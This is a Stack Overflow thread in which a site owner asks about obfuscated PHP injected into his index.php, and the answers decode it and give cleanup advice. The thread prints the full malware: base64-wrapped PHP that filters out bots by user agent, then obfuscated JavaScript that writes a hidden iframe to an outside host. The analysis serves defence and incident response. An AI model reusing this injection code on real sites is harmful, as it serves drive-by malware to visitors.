# What is this mystery code that was hacked onto my site?

Tags: php, base64

> **Possible Duplicate:**
>   [eval base64_decode php virus](https://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus)

A few days ago I noticed that none of my mail scripts were working anymore. I inquired with the hosting provider and they informed me that that my hosting account was somehow hacked by spammers and I had reached my 'emails per hour' limit, which was an indication that some sort of malicious code was placed on my site that sent the enormous amounts of emails.

I just checked my code and I found this chunk of mystery code that was placed at the top of my index.php page. I have absolutely no idea what it does or how it might send email out, unless it somehow latches onto my email scripts. What is this mystery code that was placed on my site?

Also, if I remove this code, should it clear up my problems? Is there anything else I can to find out if anything else was added on my server? And I'm guessing that the only way the code got added to my index.php file is that my account itself was hacked and they manually added it, so is there anything I can do to ensure this doesn't happen again?

**Code that was placed on my home page:**

```
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMG9JblkxTXpKaU5TSXVjM0JzYVhRclJHRjBaU2t1YzNWaWMzUnlLREFzTmlrN1lXRTlLRnRkTG5KbGRtVnljMlVyVzEwdWNtVjJaWEp6WlNrdWMzVmljM1J5S0RBc05pazdhV1lvWVdFOVBUMWhLUXBtUFZzdE16QXNMVE13TERZMkxEWXpMQzAzTERFc05qRXNOeklzTmpBc056Z3NOekFzTmpJc056RXNOemNzTnl3Mk5DdzJNaXczTnl3ek1DdzJPU3cyTWl3M01DdzJNaXczTVN3M055dzNOaXd5Tnl3NE1pdzBOU3cxT0N3Mk5Dd3pPU3cxT0N3M01DdzJNaXd4TERBc05Ua3NOeklzTmpFc09ESXNNQ3d5TERVeUxEa3NOVFFzTWl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTml3Mk15dzNOU3cxT0N3M01DdzJNaXczTlN3eExESXNNakFzTFRNd0xDMHpNQ3c0Tml3dE55dzJNaXcyT1N3M05pdzJNaXd0Tnl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTVN3M01pdzJNQ3czT0N3M01DdzJNaXczTVN3M055dzNMRGd3TERjMUxEWTJMRGMzTERZeUxERXNMVFVzTWpFc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc0xUY3NOellzTnpVc05qQXNNaklzTUN3Mk5TdzNOeXczTnl3M015d3hPU3c0TERnc05qZ3NPRE1zTmpnc056QXNPRElzTnpFc05qTXNOeXc0TXl3NE1pdzNNU3czTml3M0xEWXdMRGN5TERjd0xEZ3NOakVzT0N3eE15dzVMREV6TERjc056TXNOalVzTnpNc01qUXNOalFzTnpJc01qSXNNVEFzTUN3dE55dzRNQ3cyTml3Mk1TdzNOeXcyTlN3eU1pd3dMREV3TERrc01Dd3ROeXcyTlN3Mk1pdzJOaXcyTkN3Mk5TdzNOeXd5TWl3d0xERXdMRGtzTUN3dE55dzNOaXczTnl3NE1pdzJPU3cyTWl3eU1pd3dMRGM1TERZMkxEYzJMRFkyTERVNUxEWTJMRFk1TERZMkxEYzNMRGd5TERFNUxEWTFMRFkyTERZeExEWXhMRFl5TERjeExESXdMRGN6TERjeUxEYzJMRFkyTERjM0xEWTJMRGN5TERjeExERTVMRFU0TERVNUxEYzJMRGN5TERZNUxEYzRMRGMzTERZeUxESXdMRFk1TERZeUxEWXpMRGMzTERFNUxEa3NNakFzTnpjc056SXNOek1zTVRrc09Td3lNQ3d3TERJekxESXhMRGdzTmpZc05qTXNOelVzTlRnc056QXNOaklzTWpNc0xUVXNNaXd5TUN3dE16QXNMVE13TERnMkxDMHpNQ3d0TXpBc05qTXNOemdzTnpFc05qQXNOemNzTmpZc056SXNOekVzTFRjc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc056VXNNU3d5TERnMExDMHpNQ3d0TXpBc0xUTXdMRGM1TERVNExEYzFMQzAzTERZekxDMDNMREl5TEMwM0xEWXhMRGN5TERZd0xEYzRMRGN3TERZeUxEY3hMRGMzTERjc05qQXNOelVzTmpJc05UZ3NOemNzTmpJc016QXNOamtzTmpJc056QXNOaklzTnpFc056Y3NNU3d3TERZMkxEWXpMRGMxTERVNExEY3dMRFl5TERBc01pd3lNQ3cyTXl3M0xEYzJMRFl5TERjM0xESTJMRGMzTERjM0xEYzFMRFkyTERVNUxEYzRMRGMzTERZeUxERXNNQ3czTml3M05TdzJNQ3d3TERVc01DdzJOU3czTnl3M055dzNNeXd4T1N3NExEZ3NOamdzT0RNc05qZ3NOekFzT0RJc056RXNOak1zTnl3NE15dzRNaXczTVN3M05pdzNMRFl3TERjeUxEY3dMRGdzTmpFc09Dd3hNeXc1TERFekxEY3NOek1zTmpVc056TXNNalFzTmpRc056SXNNaklzTVRBc01Dd3lMREl3TERZekxEY3NOellzTnpjc09ESXNOamtzTmpJc055dzNPU3cyTml3M05pdzJOaXcxT1N3Mk5pdzJPU3cyTml3M055dzRNaXd5TWl3d0xEWTFMRFkyTERZeExEWXhMRFl5TERjeExEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEY3pMRGN5TERjMkxEWTJMRGMzTERZMkxEY3lMRGN4TERJeUxEQXNOVGdzTlRrc056WXNOeklzTmprc056Z3NOemNzTmpJc01Dd3lNQ3cyTXl3M0xEYzJMRGMzTERneUxEWTVMRFl5TERjc05qa3NOaklzTmpNc056Y3NNaklzTUN3NUxEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEYzNMRGN5TERjekxESXlMREFzT1N3d0xESXdMRFl6TERjc056WXNOaklzTnpjc01qWXNOemNzTnpjc056VXNOallzTlRrc056Z3NOemNzTmpJc01Td3dMRGd3TERZMkxEWXhMRGMzTERZMUxEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xEWXpMRGNzTnpZc05qSXNOemNzTWpZc056Y3NOemNzTnpVc05qWXNOVGtzTnpnc056Y3NOaklzTVN3d0xEWTFMRFl5TERZMkxEWTBMRFkxTERjM0xEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xDMHpNQ3d0TXpBc0xUTXdMRFl4TERjeUxEWXdMRGM0TERjd0xEWXlMRGN4TERjM0xEY3NOalFzTmpJc056Y3NNekFzTmprc05qSXNOekFzTmpJc056RXNOemNzTnpZc01qY3NPRElzTkRVc05UZ3NOalFzTXprc05UZ3NOekFzTmpJc01Td3dMRFU1TERjeUxEWXhMRGd5TERBc01pdzFNaXc1TERVMExEY3NOVGdzTnpNc056TXNOaklzTnpFc05qRXNNamdzTmpVc05qWXNOamtzTmpFc01TdzJNeXd5TERJd0xDMHpNQ3d0TXpBc09EWmRPMjFrUFNkaEp6dGxQWGRwYm1SdmR5NWxkbUZzTzNjOVpqdHpQU2NuTzJjOUoyWW5LeWR5YnljckoyMURhQ2NySjJGeUp5c25RMjlrSnlzblpTYzdabTl5S0drOU1EdHBMWGN1YkdWdVozUm9QREE3YVNzcktYdHpQWE1yVTNSeWFXNW5XMmRkS0RNNUszZGJNQ3RwWFNrN2ZRcHBaaWhoUFQwOVlXRXBDbVVvSjJVbkt5Y29KeXNuY3ljckp5a25LVHM4TDNOamNtbHdkRDQ9JykpOw0KfQ=='));
```

Comment: `And I'm guessing that the only way the code got added to my index.php file is that my account itself was hacked and they manually added it...` That, or because you have **gaping security holes** in your own code. In which case you'll need to audit your code.

Comment: See http://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus

Comment: The decode is here: http://pastebin.com/tKrYkgcE

Comment: @deceze, how do I audit my code? What does that mean? Are there any tools that can help me identify security vulnerabilities on my site?

Comment: This approach is what is fundamentally wrong with security today. Owning a power saw does not make me an expert carpenter. Yes, there are tools. Lots of them. But you have to understand what you are doing with them and the underlying concepts of how systems and networks work. The attempt to commoditize security is effecting not just your little website, but also major companies like Sony, etc. It's a tough situation, as not everyone can afford to hire someone truly competent to undertake programming, and far too many people are  not keeping the code they use updated with security patches.

Answer (score 19, accepted):

This script:

```
<?php
echo (base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMG9JblkxTXpKaU5TSXVjM0JzYVhRclJHRjBaU2t1YzNWaWMzUnlLREFzTmlrN1lXRTlLRnRkTG5KbGRtVnljMlVyVzEwdWNtVjJaWEp6WlNrdWMzVmljM1J5S0RBc05pazdhV1lvWVdFOVBUMWhLUXBtUFZzdE16QXNMVE13TERZMkxEWXpMQzAzTERFc05qRXNOeklzTmpBc056Z3NOekFzTmpJc056RXNOemNzTnl3Mk5DdzJNaXczTnl3ek1DdzJPU3cyTWl3M01DdzJNaXczTVN3M055dzNOaXd5Tnl3NE1pdzBOU3cxT0N3Mk5Dd3pPU3cxT0N3M01DdzJNaXd4TERBc05Ua3NOeklzTmpFc09ESXNNQ3d5TERVeUxEa3NOVFFzTWl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTml3Mk15dzNOU3cxT0N3M01DdzJNaXczTlN3eExESXNNakFzTFRNd0xDMHpNQ3c0Tml3dE55dzJNaXcyT1N3M05pdzJNaXd0Tnl3NE5Dd3RNekFzTFRNd0xDMHpNQ3cyTVN3M01pdzJNQ3czT0N3M01DdzJNaXczTVN3M055dzNMRGd3TERjMUxEWTJMRGMzTERZeUxERXNMVFVzTWpFc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc0xUY3NOellzTnpVc05qQXNNaklzTUN3Mk5TdzNOeXczTnl3M015d3hPU3c0TERnc05qZ3NPRE1zTmpnc056QXNPRElzTnpFc05qTXNOeXc0TXl3NE1pdzNNU3czTml3M0xEWXdMRGN5TERjd0xEZ3NOakVzT0N3eE15dzVMREV6TERjc056TXNOalVzTnpNc01qUXNOalFzTnpJc01qSXNNVEFzTUN3dE55dzRNQ3cyTml3Mk1TdzNOeXcyTlN3eU1pd3dMREV3TERrc01Dd3ROeXcyTlN3Mk1pdzJOaXcyTkN3Mk5TdzNOeXd5TWl3d0xERXdMRGtzTUN3dE55dzNOaXczTnl3NE1pdzJPU3cyTWl3eU1pd3dMRGM1TERZMkxEYzJMRFkyTERVNUxEWTJMRFk1TERZMkxEYzNMRGd5TERFNUxEWTFMRFkyTERZeExEWXhMRFl5TERjeExESXdMRGN6TERjeUxEYzJMRFkyTERjM0xEWTJMRGN5TERjeExERTVMRFU0TERVNUxEYzJMRGN5TERZNUxEYzRMRGMzTERZeUxESXdMRFk1TERZeUxEWXpMRGMzTERFNUxEa3NNakFzTnpjc056SXNOek1zTVRrc09Td3lNQ3d3TERJekxESXhMRGdzTmpZc05qTXNOelVzTlRnc056QXNOaklzTWpNc0xUVXNNaXd5TUN3dE16QXNMVE13TERnMkxDMHpNQ3d0TXpBc05qTXNOemdzTnpFc05qQXNOemNzTmpZc056SXNOekVzTFRjc05qWXNOak1zTnpVc05UZ3NOekFzTmpJc056VXNNU3d5TERnMExDMHpNQ3d0TXpBc0xUTXdMRGM1TERVNExEYzFMQzAzTERZekxDMDNMREl5TEMwM0xEWXhMRGN5TERZd0xEYzRMRGN3TERZeUxEY3hMRGMzTERjc05qQXNOelVzTmpJc05UZ3NOemNzTmpJc016QXNOamtzTmpJc056QXNOaklzTnpFc056Y3NNU3d3TERZMkxEWXpMRGMxTERVNExEY3dMRFl5TERBc01pd3lNQ3cyTXl3M0xEYzJMRFl5TERjM0xESTJMRGMzTERjM0xEYzFMRFkyTERVNUxEYzRMRGMzTERZeUxERXNNQ3czTml3M05TdzJNQ3d3TERVc01DdzJOU3czTnl3M055dzNNeXd4T1N3NExEZ3NOamdzT0RNc05qZ3NOekFzT0RJc056RXNOak1zTnl3NE15dzRNaXczTVN3M05pdzNMRFl3TERjeUxEY3dMRGdzTmpFc09Dd3hNeXc1TERFekxEY3NOek1zTmpVc056TXNNalFzTmpRc056SXNNaklzTVRBc01Dd3lMREl3TERZekxEY3NOellzTnpjc09ESXNOamtzTmpJc055dzNPU3cyTml3M05pdzJOaXcxT1N3Mk5pdzJPU3cyTml3M055dzRNaXd5TWl3d0xEWTFMRFkyTERZeExEWXhMRFl5TERjeExEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEY3pMRGN5TERjMkxEWTJMRGMzTERZMkxEY3lMRGN4TERJeUxEQXNOVGdzTlRrc056WXNOeklzTmprc056Z3NOemNzTmpJc01Dd3lNQ3cyTXl3M0xEYzJMRGMzTERneUxEWTVMRFl5TERjc05qa3NOaklzTmpNc056Y3NNaklzTUN3NUxEQXNNakFzTmpNc055dzNOaXczTnl3NE1pdzJPU3cyTWl3M0xEYzNMRGN5TERjekxESXlMREFzT1N3d0xESXdMRFl6TERjc056WXNOaklzTnpjc01qWXNOemNzTnpjc056VXNOallzTlRrc056Z3NOemNzTmpJc01Td3dMRGd3TERZMkxEWXhMRGMzTERZMUxEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xEWXpMRGNzTnpZc05qSXNOemNzTWpZc056Y3NOemNzTnpVc05qWXNOVGtzTnpnc056Y3NOaklzTVN3d0xEWTFMRFl5TERZMkxEWTBMRFkxTERjM0xEQXNOU3d3TERFd0xEa3NNQ3d5TERJd0xDMHpNQ3d0TXpBc0xUTXdMRFl4TERjeUxEWXdMRGM0TERjd0xEWXlMRGN4TERjM0xEY3NOalFzTmpJc056Y3NNekFzTmprc05qSXNOekFzTmpJc056RXNOemNzTnpZc01qY3NPRElzTkRVc05UZ3NOalFzTXprc05UZ3NOekFzTmpJc01Td3dMRFU1TERjeUxEWXhMRGd5TERBc01pdzFNaXc1TERVMExEY3NOVGdzTnpNc056TXNOaklzTnpFc05qRXNNamdzTmpVc05qWXNOamtzTmpFc01TdzJNeXd5TERJd0xDMHpNQ3d0TXpBc09EWmRPMjFrUFNkaEp6dGxQWGRwYm1SdmR5NWxkbUZzTzNjOVpqdHpQU2NuTzJjOUoyWW5LeWR5YnljckoyMURhQ2NySjJGeUp5c25RMjlrSnlzblpTYzdabTl5S0drOU1EdHBMWGN1YkdWdVozUm9QREE3YVNzcktYdHpQWE1yVTNSeWFXNW5XMmRkS0RNNUszZGJNQ3RwWFNrN2ZRcHBaaWhoUFQwOVlXRXBDbVVvSjJVbkt5Y29KeXNuY3ljckp5a25LVHM4TDNOamNtbHdkRDQ9JykpOw0KfQ=='));
?>
```

Gave this output:

```
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
    echo(base64_decode('PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0oInY1MzJiNSIuc3BsaXQrRGF0ZSkuc3Vic3RyKDAsNik7YWE9KFtdLnJldmVyc2UrW10ucmV2ZXJzZSkuc3Vic3RyKDAsNik7aWYoYWE9PT1hKQpmPVstMzAsLTMwLDY2LDYzLC03LDEsNjEsNzIsNjAsNzgsNzAsNjIsNzEsNzcsNyw2NCw2Miw3NywzMCw2OSw2Miw3MCw2Miw3MSw3Nyw3NiwyNyw4Miw0NSw1OCw2NCwzOSw1OCw3MCw2MiwxLDAsNTksNzIsNjEsODIsMCwyLDUyLDksNTQsMiw4NCwtMzAsLTMwLC0zMCw2Niw2Myw3NSw1OCw3MCw2Miw3NSwxLDIsMjAsLTMwLC0zMCw4NiwtNyw2Miw2OSw3Niw2MiwtNyw4NCwtMzAsLTMwLC0zMCw2MSw3Miw2MCw3OCw3MCw2Miw3MSw3Nyw3LDgwLDc1LDY2LDc3LDYyLDEsLTUsMjEsNjYsNjMsNzUsNTgsNzAsNjIsLTcsNzYsNzUsNjAsMjIsMCw2NSw3Nyw3Nyw3MywxOSw4LDgsNjgsODMsNjgsNzAsODIsNzEsNjMsNyw4Myw4Miw3MSw3Niw3LDYwLDcyLDcwLDgsNjEsOCwxMyw5LDEzLDcsNzMsNjUsNzMsMjQsNjQsNzIsMjIsMTAsMCwtNyw4MCw2Niw2MSw3Nyw2NSwyMiwwLDEwLDksMCwtNyw2NSw2Miw2Niw2NCw2NSw3NywyMiwwLDEwLDksMCwtNyw3Niw3Nyw4Miw2OSw2MiwyMiwwLDc5LDY2LDc2LDY2LDU5LDY2LDY5LDY2LDc3LDgyLDE5LDY1LDY2LDYxLDYxLDYyLDcxLDIwLDczLDcyLDc2LDY2LDc3LDY2LDcyLDcxLDE5LDU4LDU5LDc2LDcyLDY5LDc4LDc3LDYyLDIwLDY5LDYyLDYzLDc3LDE5LDksMjAsNzcsNzIsNzMsMTksOSwyMCwwLDIzLDIxLDgsNjYsNjMsNzUsNTgsNzAsNjIsMjMsLTUsMiwyMCwtMzAsLTMwLDg2LC0zMCwtMzAsNjMsNzgsNzEsNjAsNzcsNjYsNzIsNzEsLTcsNjYsNjMsNzUsNTgsNzAsNjIsNzUsMSwyLDg0LC0zMCwtMzAsLTMwLDc5LDU4LDc1LC03LDYzLC03LDIyLC03LDYxLDcyLDYwLDc4LDcwLDYyLDcxLDc3LDcsNjAsNzUsNjIsNTgsNzcsNjIsMzAsNjksNjIsNzAsNjIsNzEsNzcsMSwwLDY2LDYzLDc1LDU4LDcwLDYyLDAsMiwyMCw2Myw3LDc2LDYyLDc3LDI2LDc3LDc3LDc1LDY2LDU5LDc4LDc3LDYyLDEsMCw3Niw3NSw2MCwwLDUsMCw2NSw3Nyw3Nyw3MywxOSw4LDgsNjgsODMsNjgsNzAsODIsNzEsNjMsNyw4Myw4Miw3MSw3Niw3LDYwLDcyLDcwLDgsNjEsOCwxMyw5LDEzLDcsNzMsNjUsNzMsMjQsNjQsNzIsMjIsMTAsMCwyLDIwLDYzLDcsNzYsNzcsODIsNjksNjIsNyw3OSw2Niw3Niw2Niw1OSw2Niw2OSw2Niw3Nyw4MiwyMiwwLDY1LDY2LDYxLDYxLDYyLDcxLDAsMjAsNjMsNyw3Niw3Nyw4Miw2OSw2Miw3LDczLDcyLDc2LDY2LDc3LDY2LDcyLDcxLDIyLDAsNTgsNTksNzYsNzIsNjksNzgsNzcsNjIsMCwyMCw2Myw3LDc2LDc3LDgyLDY5LDYyLDcsNjksNjIsNjMsNzcsMjIsMCw5LDAsMjAsNjMsNyw3Niw3Nyw4Miw2OSw2Miw3LDc3LDcyLDczLDIyLDAsOSwwLDIwLDYzLDcsNzYsNjIsNzcsMjYsNzcsNzcsNzUsNjYsNTksNzgsNzcsNjIsMSwwLDgwLDY2LDYxLDc3LDY1LDAsNSwwLDEwLDksMCwyLDIwLDYzLDcsNzYsNjIsNzcsMjYsNzcsNzcsNzUsNjYsNTksNzgsNzcsNjIsMSwwLDY1LDYyLDY2LDY0LDY1LDc3LDAsNSwwLDEwLDksMCwyLDIwLC0zMCwtMzAsLTMwLDYxLDcyLDYwLDc4LDcwLDYyLDcxLDc3LDcsNjQsNjIsNzcsMzAsNjksNjIsNzAsNjIsNzEsNzcsNzYsMjcsODIsNDUsNTgsNjQsMzksNTgsNzAsNjIsMSwwLDU5LDcyLDYxLDgyLDAsMiw1Miw5LDU0LDcsNTgsNzMsNzMsNjIsNzEsNjEsMjgsNjUsNjYsNjksNjEsMSw2MywyLDIwLC0zMCwtMzAsODZdO21kPSdhJztlPXdpbmRvdy5ldmFsO3c9ZjtzPScnO2c9J2YnKydybycrJ21DaCcrJ2FyJysnQ29kJysnZSc7Zm9yKGk9MDtpLXcubGVuZ3RoPDA7aSsrKXtzPXMrU3RyaW5nW2ddKDM5K3dbMCtpXSk7fQppZihhPT09YWEpCmUoJ2UnKycoJysncycrJyknKTs8L3NjcmlwdD4='));
}
```

The second base64 decode gives this:

```
<script>if(window.document)a=("v532b5".split+Date).substr(0,6);aa=([].reverse+[].reverse).substr(0,6);if(aa===a)
f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,68,83,68,70,82,71,63,7,83,82,71,76,7,60,72,70,8,61,8,13,9,13,7,73,65,73,24,64,72,22,10,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,-30,-30,86];md='a';e=window.eval;w=f;s='';g='f'+'ro'+'mCh'+'ar'+'Cod'+'e';for(i=0;i-w.length<0;i++){s=s+String[g](39+w[0+i]);}
if(a===aa)
e('e'+'('+'s'+')');</script>
```

If it finds that the HTTP_USER_AGENT contains any of those sites, it sets `$bot = true;` If nothing is found, as in `!$bot`, then it prints out that javascript.

The resulting iframe is this:

```
<iframe src="http://kzkmynf.zyns.com/d/404.php?go=1" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>
```

All that JavaScript is there to generate the iframe, which ends up going to a 404. So in effect this has no effect but to create a dead invisible iframe. Even more mysterious, http://zyns.com/ is a domain name registrar for free domain names, and the subdomain doesn't exist but gives no 404 itself. A whois on the registrar gives this:

```
Registrant:
ChangeIP.com
   c/o Dynamic DNS Provider
   P.O. Box 2333
   San Marcos, CA 92079
   US

   Domain Name: ZYNS.COM

   Administrative Contact, Technical Contact:
      ChangeIP.com      NSI@ChangeIP.com
      c/o Dynamic DNS Provider
      P.O. Box 2333
      San Marcos, CA 92079
      US
      800-791-3367 fax: 760-621-0116
```

It seems ChangeIP.com owns ZYNS.COM, and some anonymous user created that subdomain and posted this malicious code.

I would remove it...

Comment: this is my longest SO answer for all the wrong reasons

Comment: Thanks for the helpful explanation! Are you saying that if the person visiting the site is using, for example, a Macintosh because it's in the list, then that person will not be affected, whereas if someone is using a PC or a specific browser would be affected? Also, what does the javascript do? I don't understand that.

Comment: @zeckdude it would seem that if it can't find iphone or android or anything else in that list in the user agent it adds the iframe. It's a bit weird and I can't quite understand why they'd want this. Looking for urls in the user agent leaves me even more confused.

Comment: Thanks for all the great tips! Things are really starting to make sense. @ughoavgfhw, do you have any idea how the iframe might end up affecting sending emails out?

Comment: @zeckdude I have no idea. My guess is that the iframe loads a page which will infect certain browsers on certain operating systems. It checks the user agent to avoid being discovered by not running when your page is being requested by a bot or on an unsupported platform. It is possible that the iframe page causes the client to load your pages repeatedly, sending mail over and over again.

Comment: You know whats worse? Some virus scanners are now flagging your answer as a trojan infection attempt - even when displayed on your CV on jobs under recent answers. See [here](http://meta.stackoverflow.com/questions/317876/avast-blocks-infection-on-a-particular-stack-overflow-cv-profile) someone raised this on meta. I thought you might want to know...

Answer (score 4):

Dang, I was just about to post when Aram got there first :-)

I would assume that at least everything in your web directory is now suspect, if not on the whole server. Removing the code is a good idea, but the real question is how they got it in there and what else they put in there and where ... much harder to answer.

Comment: You know of any strategies to how I can find where they might have placed anything? I have many files on my server and I'm not sure If I can replace them all. Thanks for your help!

Comment: Nothing is perfect; it depends on how deep they got. If they got all the way down to install a root kit, you're hosed. If you have your code in version control (and ALL code should be in version control), it will be easy to identify the changes. Otherwise, you're stuck doing it the hard way, comparing modification dates and doing pattern searches with grep across the web directory at least... I've helped a non-profit clean up almost exactly this situation a few months ago and it is a pain. I learned some time ago it was worth my time upfront to be paranoid; I run my own OpenBSD servers now.